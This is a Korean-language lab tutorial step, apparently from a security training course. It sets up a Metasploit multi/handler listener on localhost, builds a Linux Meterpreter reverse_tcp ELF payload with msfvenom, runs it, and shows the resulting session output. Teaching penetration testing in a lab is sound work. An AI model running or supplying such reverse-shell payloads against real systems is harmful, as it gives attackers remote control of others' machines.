활성 Meterpreter 세션 확보
이 단계에서는 Metasploit 에 리스너를 설정하고 페이로드를 실행하여 침해된 호스트가 다시 연결하는 것을 시뮬레이션함으로써 활성 Meterpreter 세션을 생성합니다. 이 세션은 모든 후속 공격 모듈을 실행하기 위한 전제 조건입니다.
먼저 Metasploit Framework 콘솔을 시작합니다. 터미널을 열고 다음을 입력합니다.
msfconsole -q
-q 플래그는 시작 배너를 조용하게 만듭니다. msf6 > 프롬프트에 도달하면 리스너를 구성할 것입니다. 일반 핸들러와 Linux Meterpreter 페이로드를 사용할 것입니다.
msfconsole 프롬프트에 다음 명령을 입력합니다.
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 127.0.0.1
이제 exploit -j를 사용하여 리스너를 백그라운드 작업으로 실행합니다.
exploit -j
핸들러가 시작되었다는 확인 메시지가 표시됩니다.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
이제 새 터미널을 엽니다 (터미널 탭 바의 + 버튼을 사용할 수 있습니다). 이 새 터미널에서 리스너에 다시 연결하는 페이로드를 생성하고 실행할 것입니다. msfvenom을 사용하여 Linux 실행 파일을 생성합니다.
두 번째 터미널에서 다음 명령을 실행하여 페이로드를 생성합니다.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/shell.elf
이 명령은 ~/project 디렉토리에 shell.elf라는 ELF (Executable and Linkable Format) 파일을 생성합니다.
다음으로, 파일에 실행 권한을 부여합니다.
chmod +x ~/project/shell.elf
마지막으로 페이로드를 실행하여 세션을 설정합니다.
./shell.elf
이제 첫 번째 터미널 ( msfconsole이 있는 터미널) 로 다시 전환합니다. 새 세션이 생성되었음을 나타내는 메시지가 표시됩니다.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38978) at 2023-10-27 10:30:00 -0400
확인하려면 sessions 명령으로 모든 활성 세션을 나열할 수 있습니다.
sessions
활성 세션이 나열된 것을 볼 수 있으며, 이는 다음 단계를 진행할 준비가 되었음을 의미합니다.
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux 127.0.0.1:4444 -> 127.0.0.1:38978 (127.0.0.1)